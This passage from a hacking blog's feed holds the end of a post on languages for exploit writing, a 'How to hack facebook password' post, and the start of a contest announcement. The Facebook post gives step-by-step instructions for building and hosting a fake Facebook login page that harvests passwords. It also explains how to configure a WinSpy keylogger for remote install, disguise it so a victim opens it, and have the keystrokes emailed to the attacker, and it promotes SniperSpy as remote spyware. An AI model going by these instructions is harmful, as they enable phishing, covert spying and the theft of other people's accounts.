Talking about scripting languages, I would recommend you to start with Ruby, Ruby is one of my most favorite programming language as it’s purely objected oriented which means that everything you work on is an object.  Ruby is really useful when it comes to exploit writing, Ruby is used for coding meterpreter scripts and what could be more better that the Metasploit framework itself was coded in ruby language. &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Python&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Python is also a very useful programming language, it can also be used for exploit writing, If you go for python first then make sure that you learn Python socket programming as it will help you a lot in the exploit creation process. &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;PERL&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Talking about PERL, it’s also used widely for exploit writing, you will find lots of exploits out there written in PERL, but the problem is that perl is really difficult compared to other languages such as ruby and python, so I would recommend you to learn it at the very end.&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Reverse Engineering&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Reverse engineering is an act of tampering softwares, applications to make them work out way, If you are interested in reverse engineering and software cracking stuffs then you would surely need to learn Assembly language. &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Reverse Engineering Tutorials:&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;&lt;b&gt;&lt;a href="http://www.rafayhackingarticles.net/2011/01/reverse-engineering-tutorial-for.html"&gt;Reverse Engineering Tutorial For Newbies&lt;/a&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;a href="http://www.rafayhackingarticles.net/2011/01/reverse-engineering-tutorial-for_10.html"&gt;Reverse Engineering Tutorial For Newbies - Part 2&lt;/a&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;a href="http://www.rafayhackingarticles.net/2011/01/reverse-engineering-tutorial-for_23.html"&gt;Reverse Engineering Tutorial For Newbies - Part 3&lt;/a&gt;&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;br /&gt;
&lt;br /&gt;
If you are serious about learning to code in assembly then I would recommend you to read jeff Duterman’s “&lt;b&gt;Assembly Language Step-by-step&lt;/b&gt;” book.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-3X37UVPXJ7Q/Txbb41ZtG5I/AAAAAAAABoY/Vc56qTzU_wk/s1600/Assembly+Language+Step-by-Step+Programming+with+DOS+and+Linux.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-3X37UVPXJ7Q/Txbb41ZtG5I/AAAAAAAABoY/Vc56qTzU_wk/s1600/Assembly+Language+Step-by-Step+Programming+with+DOS+and+Linux.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
This concludes our chapter “&lt;b&gt;Hacking And Programming&lt;/b&gt;”, One thing I would like to point out that learning 10 different programming languages is not a big deal but mastering a one is surely very difficult, Consider picking up a programming language to learn and make sure that you keep practicing it.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3121270199089759062-5940432868288084965?l=www.rafayhackingarticles.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=ItJl26hWu_w:ZJCARQV3eeE:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=ItJl26hWu_w:ZJCARQV3eeE:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=ItJl26hWu_w:ZJCARQV3eeE:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=ItJl26hWu_w:ZJCARQV3eeE:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=ItJl26hWu_w:ZJCARQV3eeE:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=ItJl26hWu_w:ZJCARQV3eeE:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=ItJl26hWu_w:ZJCARQV3eeE:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=ItJl26hWu_w:ZJCARQV3eeE:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=ItJl26hWu_w:ZJCARQV3eeE:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=ItJl26hWu_w:ZJCARQV3eeE:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=ItJl26hWu_w:ZJCARQV3eeE:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/ItJl26hWu_w" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/5940432868288084965/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2012/01/which-programming-to-learn-for-hacking.html#comment-form" title="12 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/5940432868288084965?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/5940432868288084965?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/ItJl26hWu_w/which-programming-to-learn-for-hacking.html" title="Which Programming To Learn For Hacking?" /><author><name>Rafay Baloch</name><uri>http://www.blogger.com/profile/15944091083959815608</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="21" height="32" src="http://2.bp.blogspot.com/-Oq2sCvNga_8/TkK_2qTfs-I/AAAAAAAABXY/GpgdW28vfHM/s220/226160_10150278468603001_538643000_7900302_426914_n.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-qYfGiDaHNzg/TcmbACnb2aI/AAAAAAAABRo/8bNwPCIsIHs/s72-c/computer_programming.jpg" height="72" width="72" /><thr:total>12</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2012/01/which-programming-to-learn-for-hacking.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkMNRn45eip7ImA9WhRUFUQ.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-7125638877102244257</id><published>2012-01-15T13:05:00.002-08:00</published><updated>2012-01-26T09:21:37.022-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-26T09:21:37.022-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Hack Facebook" /><title>How to hack facebook password</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_fMrF3L8CTmg/TQUqPqvkumI/AAAAAAAABE4/NOlhdzseXSI/s1600/facebook-150x150.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="120" src="http://4.bp.blogspot.com/_fMrF3L8CTmg/TQUqPqvkumI/AAAAAAAABE4/NOlhdzseXSI/s200/facebook-150x150.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;Are you curious to "&lt;b&gt;hack facebook password&lt;/b&gt;" well then this post is just for you, Most people ask me to tell them the easiest way to&lt;b&gt; hack facebook password&lt;/b&gt;, so here are some ways to that hackers take to&amp;nbsp;&lt;b&gt;hack facebook password&lt;/b&gt;:&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;1.&lt;/b&gt;Facebook phishing&lt;br /&gt;
&lt;b&gt;2.&lt;/b&gt;Keylogging&lt;br /&gt;
&lt;b&gt;3&lt;/b&gt;.Facebook new features&lt;br /&gt;
&lt;b&gt;4&lt;/b&gt;.virus&lt;br /&gt;
See my article on &lt;a href="http://rafayhackingarticles.blogspot.com/2010/01/4-ways-on-how-to-hack-facebook-password.html"&gt;&lt;span class="Apple-style-span" style="color: #3d85c6;"&gt;&lt;b&gt;4 ways on how to hack a facebook password&lt;/b&gt;&lt;/span&gt;&lt;/a&gt; for information on the above methods&lt;br /&gt;
But today we will focus on a method which has a high success rate celled Phishing and keylogging,so first of  all:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;What is phishing?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Phishing is the most commonly used method to&lt;b&gt; hack Facebook&lt;/b&gt;. The most widely used technique in phishing is the use of Fake Login Pages, also known as spoofed pages. These fake login pages resemble the original login pages of sites likeYahoo , Gmail, MySpace etc. The victim is fooled to believe the fake facebook page to be the real one and enter his/her password. But once the user attempts to login through these pages, his/her facebook login details are stolen away. However phishing requires specialized knowledge and high level skills to implement. So I recommend the use of Phishing to hack facebook account since it is the easiest one.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Phishing Procedure&lt;/b&gt;:&lt;br /&gt;
&lt;br /&gt;
First of all download&lt;a href="http://filecom.net/nxtpfnSx7N/"&gt; &lt;span class="Apple-style-span" style="color: #3d85c6;"&gt;&lt;b&gt;Facebook fake login page&lt;/b&gt;&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;&lt;b&gt;(Complete the survey to unlock Facebook fake login page)&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;1.&lt;/b&gt;once you have downloded facebook fake login page now extract contents in a folder&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;2.&lt;/b&gt;Now open pass.php  and find &lt;b&gt;&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;(CTRL+F)&lt;/span&gt;&lt;/b&gt; '&lt;b&gt;http://rafayhackingarticles.blogspot.com&lt;/b&gt;' then change it to your to is the '&lt;b&gt;http://www.google.com.pk&lt;/b&gt;'&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Note:&lt;/b&gt;'http://www.google.com' is the redirection url,When victim will enter his/her email and password he will redirected to'&lt;b&gt;http://www.google.com&lt;/b&gt;'  instead of "&lt;b&gt;http://rafayhackingarticles.blogspot.com&lt;/b&gt;"&lt;br /&gt;
&lt;br /&gt;
Now Save it .&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;3&lt;/b&gt;.Now open facebook fake page in a wordpad&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;4.&lt;/b&gt;Now in the fake page  press Ctrl+F and search for the term "action=" now change its value to pass.php i.e. action=pass.php&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="Hack facebook" src="http://1.bp.blogspot.com/_M4orZclxp8Q/SuR2hIv-PjI/AAAAAAAAAUM/W6YdptUWnx0/s640/1.png" /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;5.&lt;/b&gt;Create an id in www.110mb.com,www.ripway.com or t35.com.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Note:&lt;/b&gt;Lots of people have complaint that they get banned from &lt;b&gt;110mb.com&lt;/b&gt;.&lt;b&gt;ripway.com&lt;/b&gt; and&lt;b&gt; t35.com&lt;/b&gt; so as an alternative you can use&lt;span class="Apple-style-span" style="color: #3d85c6;"&gt; &lt;/span&gt;&lt;a href="http://www.000webhost.com/309809.html"&gt;&lt;span class="Apple-style-span" style="color: #3d85c6;"&gt;&lt;b&gt;ooowebhost&lt;/b&gt;&lt;/span&gt;&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;6.&lt;/b&gt;Then upload all the files Facebook.htm,Pass.php in 110mb directory or an other  and just test it by going to http://yoursite.110mb.com/Facebook.htm for the fake login page.Just type some info into the text box and then you will see in your file manager that a file called "&lt;b&gt;Facebook.txt&lt;/b&gt;" is created, In which the password is stored&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;7.&lt;/b&gt;Go to &lt;b&gt;http://yoursite.110mb.com/Facebookpassword.htm&lt;/b&gt; for the stored passwords !&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;How it works?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
When a user types a Username  Password in the the text box,The info is sent to "&lt;b&gt;login.php&lt;/b&gt;" which acts as a password logger and redirects the page to "&lt;b&gt;LoginFrame2.htm&lt;/b&gt;" which shows "There has been a temporary error Please Try Again" in it .So when the person clicks on try again it redirects to the actual URL so that the victim does not know that yoursite is a fake site and gets his Facebook.com password hacked&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Keylogging - Easy way:&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
The easiest way and best way to hack Facebook is by using a keylogger(Spy Software). It doesn’t matter whether or not you have physical access to the target computer. To use a keylogger it doesn’t need any technical knowledge. Anyone with a basic knowledge of computers can use keyloggers,below i will show you on How to hack facebook passwords with winspy and sniperspy&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;1. Sniper Spy (Remote Install Supported)&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;/b&gt;&lt;br /&gt;
&lt;a href="http://www.sniperspy.com/images/box6b.gif" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img alt="Remote password hacking software" border="0" src="http://www.sniperspy.com/images/box6b.gif" /&gt;&lt;/a&gt;&lt;span class="Apple-style-span" style="color: #e06666;"&gt;&lt;b&gt;SniperSpy&lt;/b&gt; &lt;/span&gt;is the industry leading &lt;b&gt;Remote password hacking software &lt;/b&gt;combined with the Remote Install and&lt;b&gt; Remote Viewing feature&lt;/b&gt;.&lt;br /&gt;
Once installed on the remote PC(s) you wish, you only need to login to your own personal SniperSpy account to view activity logs of the remote PC’s!  This means that you can view logs of the remote PC’s from anywhere in the world as long as you have internet access!&lt;br /&gt;
Do you want to Spy on a Remote PC? Expose the truth behind the lies! Unlike the rest, SniperSpy allows you to remotely spy any PC like a television! Watch what happens on the screen LIVE! The only remote PC spy software with a SECURE control panel!&lt;br /&gt;
This Remote PC Spy software also saves screenshots along with text logs of chats, websites, keystrokes in any language and more. Remotely view everything your child, employee or anyone does while they use your distant PC. Includes LIVE admin and control commands.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://rafayhackingarticles.blogspot.com/2010/01/remote-password-hacking-software_07.html"&gt;&lt;span class="Apple-style-span" style="color: #3d85c6;"&gt;&lt;b&gt;Click here to read the review of sniperspy&lt;/b&gt;&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;2.Winspy Keylogger&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
First of all free download Winspy keylogger software from link given below:&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://tinyurl.com/34jvyp9"&gt;&lt;span class="Apple-style-span" style="color: #3d85c6;"&gt;&lt;b&gt;Download Winspy Keylogger&lt;/b&gt;&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;2. &lt;/b&gt;After downloading winspy keylogger to hack Facebook account password, run the application. On running, a dialog box will be prompted. Now, create an user-id and password on first run and hit apply password. Remember this password as it is required each time you start Winspy and even while uninstalling.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;3.&lt;/b&gt; Now, another box will come, explaining you the hot keys(&lt;b&gt;Ctrl + Shift + F12&lt;/b&gt;) to start the Winspy keylogger software.&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_fMrF3L8CTmg/S6CEowUQMcI/AAAAAAAAAS4/lvvgQxZKX0c/s1600/myspacehackingwinspykeylogger.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img alt="Winspy keylogger to hack gmail account password" border="0" src="http://2.bp.blogspot.com/_fMrF3L8CTmg/S6CEowUQMcI/AAAAAAAAAS4/lvvgQxZKX0c/s400/myspacehackingwinspykeylogger.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;b&gt;4.&lt;/b&gt; Now, on pressing hot keys, a login box will come asking userid and password. Enter them and click OK.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_fMrF3L8CTmg/S6CE3LK4Y5I/AAAAAAAAATA/mSKBCb1RgvM/s1600/myspacehackingwinspykeylogger1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img alt="Winspy keylogger to hack gmail passwsord" border="0" src="http://3.bp.blogspot.com/_fMrF3L8CTmg/S6CE3LK4Y5I/AAAAAAAAATA/mSKBCb1RgvM/s320/myspacehackingwinspykeylogger1.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;b&gt;5.&lt;/b&gt; Now, Winspy’s main screen will be displayed as shown in image below:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_fMrF3L8CTmg/S6CFDVZU_bI/AAAAAAAAATI/S3xlY_RPi3s/s1600/winspykeylogger.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/_fMrF3L8CTmg/S6CFDVZU_bI/AAAAAAAAATI/S3xlY_RPi3s/s400/winspykeylogger.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;6.&lt;/b&gt; Select Remote at top, then Remote install.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;7.&lt;/b&gt; On doing this, you will get a popup box as shown in image. Now, fill in the following information in this box.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_fMrF3L8CTmg/S6CFPdIDH4I/AAAAAAAAATQ/zcBXH6PpY9U/s1600/settingsforwinspykeylogger.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img alt="hack gmail password" border="0" src="http://3.bp.blogspot.com/_fMrF3L8CTmg/S6CFPdIDH4I/AAAAAAAAATQ/zcBXH6PpY9U/s400/settingsforwinspykeylogger.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;.user&lt;/b&gt; - type in the victim’s name&lt;br /&gt;
&lt;b&gt;.file name&lt;/b&gt; - Name the file to be sent. Use the name such that victim will love to accept it.&lt;br /&gt;
&lt;b&gt;.file icon&lt;/b&gt; - keep it the same&lt;br /&gt;
&lt;b&gt;.picture&lt;/b&gt; - select the picture you want to apply to the keylogger.&lt;br /&gt;
In the textfield of “&lt;b&gt;Email keylog to&lt;/b&gt;”, enter your email address. Hotmail accounts do not accept keylog files, so use another emailaccount id,my sugession is using a Gmail id&lt;br /&gt;
Thats it. This much is enough. If you want, can change other settings also.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;8.&lt;/b&gt; After you have completed changing settings, click on “&lt;b&gt;Create Remote file&lt;/b&gt;”. Now just add your picture to a winrar archive. Now, what you have to do is only send this keylog file to your victim. When victim will open this file, all keystrokes typed by victim will be sent to your email inbox. Thus, you will get all his passwords and thus will be able to hack his email accounts and even&lt;b&gt; Facebook account password.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;See more about best keyloggers available:&lt;/b&gt;&lt;br /&gt;
&lt;a href="http://rafayhackingarticles.blogspot.com/2010/02/which-spyware-keylogger-software-to.html"&gt;&lt;span class="Apple-style-span" style="color: #3d85c6;"&gt;&lt;b&gt;Which spyware keylogger software to choose&lt;/b&gt;&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;If you are a Beginner and are interested in learn Hacking from beginning I recommend you reading my book on Ethical hacking "&lt;a href="http://www.hacking-book.com/" target="_blank"&gt;A beginners Guide To Ethical hacking&lt;/a&gt;"&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;&lt;b&gt;Subscribe to our blog and get Facebook Hacking updates,To subscribe click on the button below,dont forgot to click the activation link in your email box&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: black; font-weight: normal; line-height: 19px;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;a href="http://feedburner.google.com/fb/a/mailverify?uri=HackingAndCracking&amp;amp;loc=en_US"&gt;&lt;input type="submit" value="Facebook Hacking updates" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Verdana;"&gt;&lt;span class="Apple-style-span" style="line-height: 19px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3121270199089759062-7125638877102244257?l=www.rafayhackingarticles.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=F3WOTBK6Rfo:u7AJY8pBOKI:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=F3WOTBK6Rfo:u7AJY8pBOKI:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=F3WOTBK6Rfo:u7AJY8pBOKI:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=F3WOTBK6Rfo:u7AJY8pBOKI:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=F3WOTBK6Rfo:u7AJY8pBOKI:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=F3WOTBK6Rfo:u7AJY8pBOKI:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=F3WOTBK6Rfo:u7AJY8pBOKI:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=F3WOTBK6Rfo:u7AJY8pBOKI:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=F3WOTBK6Rfo:u7AJY8pBOKI:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=F3WOTBK6Rfo:u7AJY8pBOKI:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=F3WOTBK6Rfo:u7AJY8pBOKI:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/F3WOTBK6Rfo" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/7125638877102244257/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2009/07/how-to-hack-facebook-account.html#comment-form" title="161 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/7125638877102244257?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/7125638877102244257?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/F3WOTBK6Rfo/how-to-hack-facebook-account.html" title="How to hack facebook password" /><author><name>Rafay Baloch</name><uri>http://www.blogger.com/profile/15944091083959815608</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="21" height="32" src="http://2.bp.blogspot.com/-Oq2sCvNga_8/TkK_2qTfs-I/AAAAAAAABXY/GpgdW28vfHM/s220/226160_10150278468603001_538643000_7900302_426914_n.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_fMrF3L8CTmg/TQUqPqvkumI/AAAAAAAABE4/NOlhdzseXSI/s72-c/facebook-150x150.jpg" height="72" width="72" /><thr:total>161</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2009/07/how-to-hack-facebook-account.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkEMQn04eCp7ImA9WhRVEEg.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-4417589348831144439</id><published>2012-01-08T09:28:00.000-08:00</published><updated>2012-01-08T13:38:03.330-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-08T13:38:03.330-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="contests" /><title>Winners Announced - December 2011 Contest</title><content type="html">&lt;div style="text-align: center;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;img src="http://1.bp.blogspot.com/-Yf4kou4LKhI/Tt4XAVimPbI/AAAAAAAABlU/b2_MzMzT6Ms/s1600/logo_full.png" /&gt; &lt;/div&gt;It's finally time to announce winners for My "&lt;b&gt;elearnSecurity Penetration testing course&lt;/b&gt;", First of all I would like to thank all the people who participated in the contest, Secondly I would like to inform you that the winners were not picked by me, They were picked by &lt;b&gt;elearnsecurity team&lt;/b&gt;. We also received some private entries from people who were not interested in revealing their email addresses through the comments section.&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
Here were the rules of the contest:&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;[First Prize]&lt;/b&gt; The person with the most number of shares and the most impressive answer to the above question will win the first prize of penetration testing pro course.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;[Second Prize] &lt;/b&gt;The person with the second most number of shares and an impressive answer to the question will win &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Note: The answer carries more weight than your shares, which means that if you have the most shares and not a very impressive answer, You may move to the second and third position.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;[Third Prize]&lt;/b&gt;The third prize will be chosen via a lucky draw&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;A Note from Armando (CEO OF eLearnSecurity:)&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;i&gt;Hello, it's Armando from eLearnSecurity. &lt;/i&gt;&lt;br /&gt;
&lt;i&gt;First let me say it has been HARD to select a winner for this contest. Many of you contributed a lot: we are blushing for your interest in our course but we had to pick 3 anyway.&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;We selected based on the number of shares AND the comment/reasons to be enrolled on the course.&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;The third place was selected based on the comment and we liked the idea to let a student in the course. We support students, especially those who cannot afford to pay for the whole tuition fee.&lt;/i&gt;&lt;br /&gt;
